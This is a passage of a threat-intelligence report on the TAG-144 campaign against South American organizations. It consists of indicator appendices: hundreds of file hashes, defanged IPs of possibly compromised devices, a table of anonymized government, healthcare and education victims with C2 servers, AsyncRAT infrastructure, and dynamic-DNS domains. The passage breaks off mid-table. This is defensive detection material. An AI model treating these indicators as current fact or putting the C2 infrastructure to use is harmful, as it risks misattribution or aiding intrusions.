34\n\n20e7dfbd5c7c54d29427ad3868ffe0e833e24f795387b118143c0b613bf5fac1\r\n21aa261a83bd6d2b435ff38d3411c82bc7fa91b82adac99eb5c2153ac34f30e3\r\n239bcf64fc9d0b5dbcd7e1351444244695bd530e510846e0bb91055ca2e97ed1\r\n272eef21aa697cc7925fa303fe3aecb578cf2f572c7501a9eb2d944849dfe46c\r\n277d6e7900cfef05715f9a79f0af411e37dbd37c91590836ffb4af821a708f66\r\n27b3d1c60757aaef5baf68864dd9dc9cceb6b688be4c5ad7cfc1670035789f3e\r\n27d35c0be9120154906cb612565f02998c5fc9f7cdcd790b92c8f5a6e1bf6396\r\n27f03ad67e31c0e25e979c905629b80d98867e8e542cfabaa8a8be581a85aa37\r\n2851dc29c6a6abc8688b730b70ff9cb8f5e63facb71057fa600201c15877ca84\r\n28afc5b80ede7c040ec56b093f3748c7eb29db220901d720380eb07cf3eeb294\r\n297dcbc929793df0237cf7e5d78945873add6d6851e890339a45878a4e3ddb74\r\n2a2e92fc86be8adf429e4172368dfacd3fd0c157d0f602d713acf82c89932edf\r\n2b0314caa8db6210c626bcd9773c0d3c848a05721c49024b3bffd34b8a21724b\r\n2cc8aa53e3e30f1c09950e4ae1262f8df3588b8e31775318ef951fd994b5b918\r\n2d4db0e8a6a2dfa3806696d22f25bcb9cd25dae881a248d6746c306a7ca0bc7a\r\n2e82689cc5a2d9beb0bce4da3330122e5cad896a04b1296c5fb9b54fe3e92f52\r\n2fc4aaeaf8eba6c4d8cc4622ac7693c65cd3cec421f611b43dd252c18816e551\r\n302134f47d1724a2b3c6e06e53831caf2ac86cc9b94f470c8f8641b1cb4026f0\r\n319a560130015fa1c53149234321ba5313e5a93f06de6675f5da4a8c2dfa1cf1\r\n31a5729f1bcb928bab9a9606e4f3c3d12012332a633eb3fa1d26c014917f891b\r\n31f58aa1dd25b7a341e4de125ef6adc4268af4a97501bf0882adb7af244773f7\r\n32b8929c4bf6ce8f74c470b6f1aff0be75ae9ca7df66ace39f2a849095427a73\r\n3378b49278032fcabc8f4b4e6622eb87cffba645987b1f81161905452aef175a\r\n33fddd6a9d4bece9be47be6d623da228e4cb69f5c51aaf61ffb75c803957396d\r\n359eac88704e65913b7331affecd4ca911b52f000e68599f24af96d6ad71b82f\r\n370e7db7155cd9b03875431462ffc8223dcc4bf7c1dcb5a07420e84bc6316d93\r\n38019ee88bba4b4ceb159643c5a2a2608b628ef673e7ab7516ef47f6f6230618\r\n3a625c677ba81aa0639129c07cf7991e39be78e9e1b23bb31005e75c19de8580\r\n3c2940ad16f414f884e8c6f90c1f36a313f9982152b9aa8d355282ee7bc81a9b\r\n3ce0428f9fe958fb6cecbf7bfe8cdb719550a1a3a5b2303686c696bc21c82f78\r\n40714eff62e3c9f7b7588a56cbcaa115a800c6b336de2a82f87d2544ab2daf69\r\n44284652527348f428112ea6eb564103d72edd650e3d0c831ad91043c99d5ffc\r\n4442b45bc6cca253a7a53a1b2a872df3867b898403ef0d2c3a8cf5687f615aed\r\n44ea4a98e1ac0e0d4c7063992f562cc893b8ff4da7fe72868b3fe487c061dbb0\r\n45185844b576c28810d12c849fde05cd6bd23900ca97394f81a98b7872490ad0\r\n4564bdb245c4e6248d78aaea7b588ad3faa79514e7662b80525578dc615e07b5\r\n4776dd03944a13cd756ab7fb4ac979fab7eb6ff92f5f23e4138a06a2aeec9581\r\n4790e32d8b33b9cf719d84a83eaf2a5d953d0a9dc22843276ee343d60f1b7565\r\n47a2313df0d0a74c1be649d04236dd10b48693a5da0db30335d77371f4ae7fac\r\n49ccc8aa8b6e505207743cc172193f948aaa236304018da0bf0d2ccfd8c0e985\r\n4a812c47b5b4d7b2e383cde74fa61bb49685f0820c88d570ff6a921e631b5926\r\n4becc5d800d9851cc25fd09c848e834d019c2f57ec7bbb513d03eac6e4344287\r\n4e1597543c0d63cf44db982f9c5cdb0ebdb88343ab8e8711501103d5f2ebb06b\r\n4ef47b3e56af3742a6f8389f126ed14a2114ff2e8dbf7118511cf62cd0d8bd79\r\n4f6d6abe27b5e7e9aa55ada51b521e8fe715c6c0bf4bd2e2838c9c85f543f719\r\n4f6fdc5d3b90b760670a2545ed96e8eed348ce2c0fae37058fd7318df17cba07\r\n4fc1890df01994a7163f1605c8cb2a660531cb9e6cf3d05622d97791df337aa3\r\n508176ecdbf35360d23083f25c762493a2ebbca1d4cebcd5953b00d1e1be0741\r\n50bde48b7037890d318cf123e23a78f734634cff29354fc5852293d5702737b9\r\n52ad9c51a0d0ac35f7934e85770ed32de61f214b7551fd5310f1a342e154309b\r\n53e52d8dd95c09616022e09d7b94901e2f5189c258438cc910ab19760bf36da3\r\n56e66a73d0ec0ef032b8fc157ef65f38d97476066b4a5cab88ad036fc25e8634\r\n593a1b142fc855ad10cbc84e107d3a2cd248e88749658af8f6f656095f6f883a\r\n5b8aa9408ee3d18a803df688974bfc125b110db19349e1938ac8d3bb6a966fcc\r\n5bfedb358b5ebe7db6793dfb87885fd08d547cdea786659654bc717c98825a00\r\n5c51dc904076cd5dc22fec10fa18563ef5283ebcfeec6f4bdc23a7504f1d5838\r\n5d75ad8822f8149ddc84f1148ac011b9c39a7979a611bfe2bc8c2090e4d54728\r\n5e07c2f16fe5b2d60c4daba73c31f298b2fba618d329e57ba806c19a7663cfda\r\n6073590a4b09dcd26e35a6c831691e537736a292a7cc5bd668b07dbbf1000415\r\n60ff5136bfcef60a83320eef711bce7f41a0447f95568d09e908a49f351344da\r\n6140a9a1ffaf120d6f33097c1f8bfdcac83db5d883451a073f0cf2524fb1996d\r\n61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa\r\n627d051af3b66b3ba4337c688250f2621abc9f3b4cf1434e10654ada10887881\r\n62c0672bd77beaab3e5546944e23f7db1f66a207d9eecbedcaaebb4bfc47b954\r\n636acb2498b3cc5a455badd95e1839edbd84d46b18af80e1f5c4efe6cf573c3c\r\n64a4287f7973fdb7a9030679dda5b1d175d34c568910282dd532dffc45af6e9c\r\n657e021f0dfdd8c628a428a824da278d14d674aefd248f86a58f5bbe4472f0dc\r\n666f8ba7a9704f98ae74481fab1ce77c3256bad31d22206c5cdf9cb1009c4b2e\r\n6849da9fb64c3db1e883aa1a106a03c8e69d3e41d4be8a81bafbdd78f2f311da\r\n690c8ee15e2bae3050b1ba813e4b7fbd8ee93d9b7132745aec345372322d69fc\r\n6cac0e0c1836de13434a251e8c792b459ba4e573023be0472898a26fdeef3f20\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 23 of 34\n\n6cae1f2c96d112062e571dc8b6152d742ba9358992114703c14b5fc37835f896\r\n6d41b3409dbdabdc5109f72b190e2a54ed82b2cbb15951ac077343b2b0e81241\r\n6d4a557b0c436b278bf484d9aed2daffa66c105c9056e6156216a6f224c086c2\r\n6d540d76f627bc97929b77e2f613ff641be0810332505b010164f38940d0120b\r\n6dc49027dcfc978c4533c46bc9b37a39c7038a347ae5bb5535439517b2075bfc\r\n6df21a64f5b80d9e214a721e2025510fcd29ca191f8ff39386e07b15e06afd95\r\n6e7d32278271b077912779e2ef7f5aac3246578393ad93024c2211a86380b208\r\n702e912dac9885a2a74094d14b5c312d979aa86412f5fe6b612ea2bc0445a572\r\n705ea94689cc1507c6ee13bc2e8d54bde154a4a9880e2c1049f4036b9671631a\r\n708924eabf4e730a1eaa5e2db2ab6d483458370763efebdd31d25fc95c04945a\r\n71153a5e57cf77267bfef881faaf3575068c79fee2cd9165252d5e885bc9e5a3\r\n73c28224eca789607d77884620425d0fad56ef7591d6cda5f384a49d19beb5c7\r\n75001105ab3d7363f619f77a3a4a8a62422f9b28ae299a06c34b9bc474610e7f\r\n7652a17de2e02c57fd7a20cb690fec60e63f4223e6d990375737e93579e92957\r\n77128fae0b6acdbc56ece8ba39015d42fc561794d8ecd1cbba8d9c423ad99439\r\n7748317f687fe8cb70e0d48d528223d8737b462235837e6beefab6f28e553ffb\r\n78f4cd376fa2eb034e90790c5f963d0439251e2425c86ae64fc43e4e2509d75a\r\n7909978dc2c58e00379f31c8fd34f15b56ec714c3cf0a5804c7b164d15cbeaf3\r\n79512c2ddc11fb9d9f95f7e6fbacbb91db53362ce6799cf89d870683e63f4605\r\n7a635c5189632764d900111b53fb26f88e2c7bac46bd5c38ad51ac7fe962ab48\r\n7b9da4885838c16faf069a1b0f29ce6560ca8c65ad60f70f8c8f77ab2f2df4fa\r\n7c02f8bc0d327a8f061be14476004aa13e78bb348dbbb9e1eb1a255e9edd3f8e\r\n7cb8124af5c9942809588851783438f25b4a79224c63c0d3a2568a662706334f\r\n7cfe415ee93c8a321d7f90315ca3f70629fda89c6e4acbde87ee1abd65cdb25e\r\n7dd67fdd9eba6f4093979ee73f01e9c29231530ea73acc90948fcffce17f8d5d\r\n7e0f17ee075fa068cf0ff0751d7e1f9c2512628f20248cfe93f742fc1d3d60aa\r\n7eaaf8ac1097ba3bcaf0f9cd166e5ed10e6ae16d04a78ff227bb6c584316f01e\r\n7f206ec690f881a7939406e51f1df454bb55a0fa6cd8c0892b05dd7249ab3db8\r\n7f4949366003ad5c97543d39a3457d91922c489dd929038a764fe6cc5c410604\r\n8069dc3a01b238d5506448abd7cddb3a7c583b81b209e516481b2923aac90782\r\n80a8c38c435b42fb1a5b77d85da369ca40b7d4206cc936f04732c4eb3527ae07\r\n80ba2478e4695de6db6ee1bed092eab38cc6c4243f3ba6e6a16ca180a68520ed\r\n80fe3676d482c19e5909ca6d4dc014f2f46504dd7c0b48fad5a56d0060958abb\r\n82556970b87adf24162bdea13611a0206e2d2d6ec1020da29317bfe5c7b51de9\r\n829e7dff6a229fba6f0b51ec344cad5d5ffe35ae6e747600fd6660d9ada349e5\r\n82b733a36bbbfb27d602e728314398c6db1b5ce3d37aa584c50cdf625fd949bb\r\n842b97229574ce1ca55415fd20a80dc29f1b35b8776a8d482bb5997b53b6f26f\r\n84ec8e3181e19f5c492ed3c43cf69e74ca7ef109b535b7b82143ba9b2d59442f\r\n84f4733b7eaeea866b3f35e932f25713f621817c79f0096c9da22a3973430286\r\n85cc9928363eb10ed90785a217d5f51e37a22efa4a7f30bdb8bc82ab2fa1267e\r\n86bad37b00f1e0b3c38bed9a6f6995fa332761a1bb1e826a0708ab80ddfe6a8b\r\n88490dc46e9e631c09526cdfd0ffdc6ae7be26bb35e58903ca52973e7d0e34cf\r\n8944005cc7ce00627022ebff406c65e780bb87fd56a2bed8db91585867a50346\r\n899ce743d330882aa2f28d6a6ed6c3def3e409d8b20149b0161716e104fdd7ea\r\n89cbc0a596623b035e90dd76cdd27aca583edda8d64e7174b2a4fcd6829b42fb\r\n8a7bd4d6832c72f8fdfeb1eb7cf8c89107c9ec617b875a62e659f12da2acc3d1\r\n8aa26ab75ad89a6eebadb7f1da170f62ff81abcfe44afb5fca2ae1d2dc0b9e1a\r\n8b0a8fb7c648e80397067ecd714092d9904c6d8625f67aa1aef2dc864891ab43\r\n8f61b17b3528fc2e4a5d7fa647b7aa86e7653f98a90fa5e2e08b0ed51e69de3a\r\n8f7245f0797164e14902ede0ccb4055452b3fd293559d5e652724d33ac2f381b\r\n8f972b2fba44198800333d8f7d9b9b1daac3c0d4693481ca8ac8f6cab4af989f\r\n904f1f112a522dba3be4fc8412cb240003f8c5772014ad7233092bbd8e4e268c\r\n91c63ebd9c9753eebb6059358e004e9aff0c8bc590a81c8904b2aec5d08a7fa9\r\n9305f79e4ebf3863c9503230744c03bdbe3e5fe65e8fb7e2f29ed6a5081d23b0\r\n9426b4682adaf3a2166a0c92b5b710e3351f102feafc26a0f3f11332ff6ee00e\r\n94d9c1e115024ef099bffddfd7780e1a8a593be41f613a464ee565936c121119\r\n94e3299936f3a8a903f08c04b0579ebede2cb3917e92e727142626c5391bdf3d\r\n95687da203507a11837eaeb29bfe86481828b74b62fc869604b5eaa552f950c2\r\n95b2b415d6b4347fd035db1eec5f979b377bbcf0171b153b1110021bbba6cac3\r\n95e5c56554c9f3a36401a084c7676ed156ab9aa1b9c6bae282b6772de9cc8df8\r\n96a31ddc63bb894c41f389a222e84a48cefa4c117e66e3ef166c36c8a0ae9f19\r\n9704c2c88a3ea50c430b3485dbb5f9374785333bf65a6577fde16fa3e0e4bf48\r\n9945a60ea4f2f1cfdae3ef85ccb74af2ee8b80d84889d3897f6c2a034cccf9c2\r\n999d6e7ce39ca8e9f85ab0f2e53db9e503a765a3c5515f6336c491f153a005d0\r\n9a42050380007f9982c8e59da42c6cba94b30ea12403691886bfc91c38fb92b6\r\n9ab94cafd45dc195625806c133c6a8d411669d69a50e5a9006c841be75539687\r\n9b1d205dc28f1471e09aaa67c3fd10327531e5e5d6590ddc216f03a41cf9b92f\r\n9be19996b731955043513227171aa0a91ed825f1f5616f5a3b94dfeaa1651da7\r\n9c05646d2deb572ac87ad74897905ecaff050173ea2af8dcfd7acf1adea7772f\r\n9ccea0fcf8ba30f933dfcb6e697d46c8bcba0744250cb4420b41d3369e34a6a0\r\n9d3c887b526df1630a1e46bbcdd7148f5d5f2e8c964eec8aaa0b01b294b944d7\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 24 of 34\n\n9e8b12807c3d7a542cec5bf6a5781a2f6c300938313b1d1e129293a4202035ec\r\na0bce2bd548a9f33da2478ed6841c780d6f0f63fce0be90b89fa189e65762b65\r\na0dee795b9fe96554569c2854167647f630be4399f294dd2cbaf58bb8acb27d6\r\na25e799d14d882edc5754916885011c98d3f5a15ae0b66fbe83a183b0d9a18fb\r\na2b268ad1797615fc174bf71a3000bb48a34ba439289ad62d1734e86a9a638b5\r\na38beba261e6b75233fcf7d0f019644d985b80447d27d5a2d8939d75869121df\r\na3ca3c50a8693d0454d113b9ec34ddb6aab15a6fefea415596ea2535d2364936\r\na3e7b5ecc6ff323ac3e57197cd82aa0cc8ffa07abf3488a804e29c2725e696e0\r\na3fafd76cc487289ee5d259d046ebbaf82ffa71c13e69f3538aec0a7fca593df\r\na45dc0648f247eee9ae3ab15d1eece5907624a1a250feaff7e8ffcff8e04fa1a\r\na47039fa1a8aa88d170890d4c9a12aa356d9adbc845593cc1638c85ba120dc78\r\na5085f9c7304a762e274524b96dfc34f9ca243b479a2472c6e5e5b367f46114e\r\na52e245dd7937094711b10c479274a2cccea2dfb89f7d4c9f22879214718f92b\r\na61b40b09b2c8f714c7cf70a92a9b215cc53cc3962a543b1bef4fc3999a6f6cf\r\na85332e4145ab71582bbfc0f6cff9d24e0aeb2c45c8e69c6af860bf2255c86af\r\na97c3e3513946498242a032992ba05946787ba736facad8e51c192c3ad272713\r\naa7234653c35c44d1f952fc62808f3831f97637acfe1c4e0b1e12a8e291b5f4e\r\naa8b92535e690da968234d639af28caf881f03ad1f4dcad1c692b846830d0d87\r\naab18e256bd738597364a8a91f37b316abe540999ad13f60bfb506f3353d40db\r\naaf3dbfd566b4dc833c0de88435132f4185f589d37211386f799b95722e37a33\r\nab4a471521b43632e071e53f28e15e1b68de8c2b8971b62985e7251bf3382130\r\nab64e78fe74b47890929238bd6c60e55c3c2c0a7f84c76c170f2281417e5da17\r\nadd9a93c013732ec36a6554212d75b7969e46b6dadb55bf82c34d9a5e20a9d1d\r\nae9a36c85c11f5f71596bca8f3b01b49b0175be9d9b1367d09419715edda2b02\r\naee42a6d8d22a421fd445695d8b8c8b3311fa0dc0476461ea649a08236587edd\r\naf07986cfaa6184e2888310a493104909ab9eee6f1512a74633331afbd32fee9\r\naf5c473f2f15835d745853d7127769d77f04611efbf792634f6d1f833bd150a2\r\naf891967c363f51bdd6cb33bf9d058f8b98337d1c387ac976e7c568ddb43b641\r\naf9ddb84ff76790fd8f596ff845784abd3464c74bb8b82836ce23189c4b7f183\r\nb08e83b034213d1c4d33e29c63d8d24b99684c2714e29ae3b3aaec34d5c8d134\r\nb219c4089fa80f02dd5ba6b280c0a3794af9cacf7460d090f23a56fb100d558c\r\nb231204b60e0b4e8b462af718964fa54d544a9658225c47e314e3daae0efc0b4\r\nb2bea3384dc24126675379eb1473946f2927a10d8eff6730bc024716ef0f6864\r\nb2fd262519105fb279e36476380f83068601609492f410d5e700d3a764e2ac36\r\nb315aa63ea29afe35dd51c2382d48bb6de5e1d9166368df00eb2d7750eb747f7\r\nb4491285f2084f070ff3f15c150568d920dcf327600c30b539063981dfcfeee4\r\nb49dfaa0d915524049eb0eed26115dac421cd307551284a054a27cbbdb9aad81\r\nb5739bfbada346770909e8287fe1e2ec45d662d9958355a4aa4f47423118b8e8\r\nb5a44cdcc65c728f7e447eff764905d6bfda4039992b470afe2cc84ce8dcc5f7\r\nb5a6c21c9fc7033418be5efb45746b181551e346ab255feca19fd0d40cbb0942\r\nb633f0a171dbd8b0e06cee74602f9863d4133566cfb56fabfb95e281ffbb6fdb\r\nb6bab712bb3a684b5c7b7e147e5d8ba293e4934ef443ccce3a8914b6d3e28df7\r\nb7688d7428dbcc35afbff30b349adf1a16667e3736c47a9f27a86decf9d1b37e\r\nb78a931beae08692b1368197832e4dcabbfea87f6c362258ea854d4e5658240d\r\nb7d205a1560b07a92d744053744c29823064e2c415a71887fccd8524a3cad3fb\r\nb821057045d27dd6ce8e14dac6e93d42c9ca47ce1e86390c5d2dac0401d28601\r\nb97420f542add6441b0fe7389aaf327a9bbf3cca5174280b6c64de264d2dbd7c\r\nb9a7fba5330cc0d97990178d1c492deddb1f287f21de30c40b0e4e2f47b2be21\r\nb9df7d55692a03d3255e824a37cd53de11c07e51864809ceca01362a56b991d5\r\nba604a46a71d45d0bb3ba3eea9f0faece3d48ba6ff2872778057ce8a0efc0d33\r\nbac96f81c8485c3bd6193bb3451f30feb0e972b780463beba41a9dc1121aa9c4\r\nbbbbc1e8c660d2d8b00d87446e52d3be20da3f4da7c3505e3468ad731eff250e\r\nbd34831c864eadb917c78ad850b9e40685f17dbb1927018ff9d3dbd1f6d57ce1\r\nbd7dcd2e04ece48f19494ef3236127492cf332fdc7f8c4e9931b0a434bd4ffad\r\nbfe2d9f203a8890182df4737119ffbdb91527754bb06e7108415a45b47ad41ef\r\nc0cbee9a428f04a894b71255b869d00e0c2ab06dd1740bfe89338b8c65f8c46d\r\nc10317f74c6f011a71bbb4df80e7b6d4b950de436a2f49effc3e443c4f6920d2\r\nc12239a964eb2a9631f02489464a67d2c0837bb36e32a53cd6bc03301082d79e\r\nc3f5376c06e423482735d896285dd9bcbeee98874075cf47bec41e3448bd2f95\r\nc51e59b60975fd8e8cddac0827068da0c8a4c3928c6105917cdb28b95a7cc551\r\nc63ce128ee4c0442e303b86d27e3e7df8eff15a04a44ada8cabfa965144ccf56\r\nc671155c2ff3529435a4facaabd8a06c6f5e559ff24763d6f387bc818c453727\r\nc69461854c0d9bcf75261e78a94bc1a5f9b8daaf6ec536c7e83b528649f2eb5e\r\nc931b2128f9bdbf85d0914a97dbbe76bb3220d3a402143bd14d1bf32f820214b\r\nc9776da6cafb9537f84841d4e4b1ae8c3a26337c9fee45176881c1d114a63980\r\nc9a017f4180ec82ef8e0d2340d862bdc3d993725b8a3eff0ae15e9d2f00f4e69\r\ncb70a3999672fb0949fcee0898f84346140a79868b0b97503cdf4ce715b86564\r\ncceb4541dcaea1b067bef64943b47653d239ac07d6ee6f50d74832545035e350\r\nce2a7bafbd2a2700a7ba5962f13cf3f85be1f2b93e48d588a4471be122c8340d\r\nd12efa7c95087156cbfdeda07b3c68d7f2d9a31162d952c1dd2e25630e369416\r\nd15e2227283e9f87b19538f1ffe0de9fcf08efa30a9742d3ec7bfb9c7f595837\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 25 of 34\n\nd1de1db53d364adf0ff850b17ed5269dbf45518608807c554ee29052b4a8fefd\r\nd25df9c7ec360528cf3fd9a88ed04660ba8bec6b35ce2de04fa4d09a9d1666c7\r\nd41678f5dcf883a744c19083458f81ab3876ec71dadb1f81443728a38be3709e\r\nd8119df3e735dba78bc6c528f2737d8acb2e87f442596c810afcb5fa85261ad5\r\nd87c126baec640657fed03c6f493c2ad36b5e0f0483149b952e18688ab422276\r\nd8e3821ebb6a4af82f51591ab4a222add7163e2b8d33a642e1ca97bf06aced45\r\ndaa19bc1bbf65c80278076621afb8764b5d258d4b3a7280f6455dde812bc24c3\r\ndb3f21ef54324633b2102bcc127289348fe777382fe5dcb4380eafdfc506fe7b\r\nde162fdd0926b15a321150307806d4597e71395548b572e83bda5cc378743fe0\r\ndf0fe5536a69848a22b1b22f424a9bd598adafb30e09101dc98b214e09a1aef2\r\ndff4319ada078e744497da2f44a594228f2dde3761a0c80ebd5df43e7cc41b85\r\ne006c255d66a4eba50c26fffddda6f415d165a16eff5658413312d05c5f50173\r\ne3e14c713fd8e72e3e37d3e9b2cea2ed7bf70621c7c04263ed7ac6925d817086\r\ne4a3a4a5f88e181089d783f56aec7d2fc2f4647ac12b5de03746f81921097063\r\ne62966578720b4ab47866fbfc00011b72aa2c557fa95f159c42473d5c71261e8\r\ne6e1b9b41e158bbcbc893681e66d90ddc08f3fe7de1f5ba45eb53d4a2577db79\r\ne779571e4f80664738634254eccbf6f32bd51ff64ac4f0080ff43634fe723edb\r\neb3acf4a55cceb591712b83074568acee909a60669054dbeb5f0c0bc464a9ab0\r\nebd0127b3dfdc0dcf24f4a0a269769835d17a8e685193792082b359b843412ff\r\nebed364d453d5109b48ad9e4a12a887b8abc6a738b5030f2ca87d29a4a3b1f87\r\necb0ce4f96a59bf9978986f80709c80090d449ff7605f983e6cf708188600144\r\ned475a5fe53c368a1899fac98a6b88ec863f89ea07b7e571e6f0ec8b060262af\r\nee1a3803936b0f51c8fa1e2ce1fcbfe092f0c2e846d5fd5bb075f3ad931efe6f\r\nee966ef554884cc383b2bd03f39786af388a6712bf9e6facbe466faa1fef0251\r\nf057cf513f34fa8e036010389ab288207810fc14d1230a40f51d9abb2344f1c8\r\nf13be087d76de879d7d05da89aa14df3548b11138ef8943b2d9d11c9dd627133\r\nf1b9bad3c87e18d9abc585e17ccb2f0e3a266006eac12a2a3e1bc180d2f8a435\r\nf3fb0a6c6b3ba744cc8122148efd2943c8602facce97356a4008d67485afb55e\r\nf6caac63455aac9593976bac3fbf28378b89bd00a79fff2fd2563e24adf81ace\r\nf700b67bcdb5539105795c84ff283ccf4140f12a58b82501ad38ad29dc7e9c39\r\nf769521b8f831a9c7a1631dd9633e74cca1c39305ec995a4dbf8a77302ec2948\r\nf95dac0cdd08d1f5fa2e5032cc7a95a87044201c8601198b3860e501098d6549\r\nfa5a9e5bef372869f08e24ecfe8e68b12523f1a02607cd12d5f7f219b7dff8d1\r\nfb66632cd45196cc46dd75ffb02537e72772d6998f39743969bbaa1852362592\r\nfc4b79823478e62b18a49f18d70bbaf768e89e498d64b4c200ee873b1fe6554d\r\nfd665e99f65e34317e5b29b8b7761415317c5831bb91d843a76d477b6df19f15\r\nfd755425f8805b90b8c82ffa9e2d04d274811b7508b08a187b2a41148ad92a9a\r\nfd7a64d15e03608dceb95bc0912b39f9b94327b7ba8e6c989aa29205c3819184\r\nfe08793903f42d16cbac8a5b766d403a7c2f48e85672782e96197387adc4ec61\r\nfe92d0f395ec3d9a658bb3372318a9ddee1a7819f82ffcdf2cc98044d2a70f3b\r\nPossibly Compromised Network Devices:\r\n8[.]242[.]185[.]28\r\n38[.]10[.]181[.]2\r\n38[.]51[.]232[.]73\r\n38[.]51[.]243[.]33\r\n38[.]52[.]156[.]157\r\n38[.]52[.]157[.]13\r\n38[.]191[.]200[.]22\r\n38[.]191[.]211[.]165\r\n45[.]169[.]38[.]202\r\n45[.]173[.]12[.]108\r\n64[.]76[.]53[.]93\r\n138[.]0[.]90[.]150\r\n143[.]137[.]98[.]182\r\n143[.]137[.]99[.]214\r\n152[.]200[.]146[.]245\r\n152[.]203[.]33[.]47\r\n152[.]231[.]30[.]83\r\n161[.]10[.]134[.]110\r\n170[.]239[.]205[.]17\r\n177[.]253[.]232[.]42\r\n179[.]1[.]85[.]155\r\n179[.]32[.]41[.]81\r\n179[.]189[.]222[.]53\r\n181[.]33[.]141[.]47\r\n181[.]118[.]156[.]251\r\n181[.]204[.]42[.]51\r\n181[.]225[.]72[.]167\r\n181[.]233[.]154[.]8\r\n181[.]233[.]154[.]17\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 26 of 34\n\n181[.]236[.]232[.]212\r\n185[.]75[.]12[.]39\r\n186[.]121[.]70[.]159\r\n186[.]168[.]153[.]205\r\n186[.]190[.]231[.]215\r\n190[.]0[.]246[.]233\r\n190[.]14[.]253[.]207\r\n190[.]60[.]35[.]218\r\n190[.]60[.]55[.]14\r\n190[.]102[.]120[.]123\r\n190[.]121[.]144[.]10\r\n190[.]121[.]150[.]213\r\n201[.]182[.]249[.]194\r\n201[.]182[.]249[.]243\r\n201[.]184[.]74[.]141\r\nAppendix C: Cluster 1 Victims\r\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 1 Government 146[.]70[.]137[.]90 2025-05-20 2025-05-23\r\nVictim 1 Government 146[.]70[.]51[.]42 2025-05-30 2025-06-09\r\nVictim 2 Government 146[.]70[.]51[.]42 2025-05-20 2025-06-04\r\nVictim 3 Government 146[.]70[.]51[.]42 2025-05-20 2025-06-04\r\nVictim 4 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-05\r\nVictim 4 Government 146[.]70[.]83[.]218 2025-05-26 2025-05-26\r\nVictim 5 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-05\r\nVictim 5 Government 146[.]70[.]51[.]42 2025-05-20 2025-05-20\r\nVictim 6 Education 146[.]70[.]51[.]42 2025-05-27 2025-06-03\r\nVictim 7 Government 146[.]70[.]137[.]90 2025-05-28 2025-06-05\r\nVictim 8 Government 146[.]70[.]137[.]90 2025-05-12 2025-06-09\r\nVictim 9 Government 146[.]70[.]137[.]90 2025-05-24 2025-06-06\r\nVictim 9 Government 193[.]56[.]253[.]66 2025-06-10 2025-06-10\r\nVictim 10 Government 146[.]70[.]137[.]90 2025-05-08 2025-05-30\r\nVictim 11 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-09\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 27 of 34\n\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 12 Healthcare 146[.]70[.]137[.]90 2025-04-30 2025-06-09\r\nVictim 12 Healthcare 193[.]56[.]253[.]66 2025-06-13 2025-06-13\r\nVictim 12 Healthcare 45[.]133[.]180[.]26 2025-05-06 2025-05-09\r\nVictim 13 Government 146[.]70[.]137[.]90 2025-05-28 2025-06-10\r\nVictim 14 Government 146[.]70[.]137[.]90 2025-06-06 2025-06-09\r\nVictim 15 Government 146[.]70[.]83[.]218 2025-05-28 2025-05-29\r\nVictim 16 Retail 146[.]70[.]83[.]218 2025-05-27 2025-05-30\r\nVictim 17 Transport 146[.]70[.]83[.]218 2025-05-26 2025-05-29\r\nVictim 18 Education 146[.]70[.]83[.]218 2025-05-29 2025-05-29\r\nVictim 19 Education 45[.]133[.]180[.]130 2025-03-19 2025-03-26\r\nVictim 19 Education 146[.]70[.]57[.]58 2025-04-02 2025-04-02\r\nVictim 19 Education 45[.]133[.]180[.]154 2025-03-31 2025-04-08\r\nAppendix D: Cluster 2 IP Addresses\r\nIP Address ASN Suspected Type Malware Families\r\n45[.]77[.]72[.]102 AS20473 Virtual Private Server AsyncRAT\r\n64[.]188[.]9[.]172 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]173 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]175 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]177 AS36352 Proxy Server AsyncRAT\r\n179[.]14[.]8[.]131 AS27831 Colombian ISP AsyncRAT\r\n181[.]131[.]217[.]63 AS13489 Colombian ISP AsyncRAT\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 28 of 34\n\nAppendix E: “deadpoolstart”-Themed Domains Linked to Cluster 2\r\nDomain IP Address First Seen Last Seen\r\ndeadpoolstart2024[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-23 2025-03-12\r\ndeadpoolstart2025[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-14 2025-07-21\r\ndeadpoolstart2025[.]duckdns[.]org 179[.]14[.]11[.]213 2024-12-13 2024-12-13\r\ndeadpoolstart2025[.]duckdns[.]org 192[.]169[.]69[.]26 2024-12-16 2025-05-20\r\ndeadpoolstart2026[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-14 2025-07-09\r\ndeadpoolstart2026[.]duckdns[.]org 179[.]14[.]11[.]213 2024-12-20 2024-12-20\r\ndeadpoolstart2026[.]duckdns[.]org 192[.]169[.]69[.]26 2025-01-25 2025-07-18\r\ndeadpoolstart2027[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-24 2025-07-14\r\ndeadpoolstart2027[.]duckdns[.]org 172[.]93[.]160[.]188 2024-11-07 2024-11-07\r\ndeadpoolstart2027[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-12 2025-03-12\r\ndeadpoolstart2028[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-29 2025-07-16\r\ndeadpoolstart2028[.]duckdns[.]org 172[.]93[.]160[.]188 2024-11-06 2024-11-07\r\ndeadpoolstart2029[.]con-ip[.]com 64[.]188[.]9[.]172 2024-09-22 2025-06-30\r\ndeadpoolstart2029[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-03 2025-03-12\r\ndeadpoolstart2030[.]con-ip[.]com 64[.]188[.]9[.]172 2024-09-25 2025-07-15\r\ndeadpoolstart2030[.]duckdns[.]org 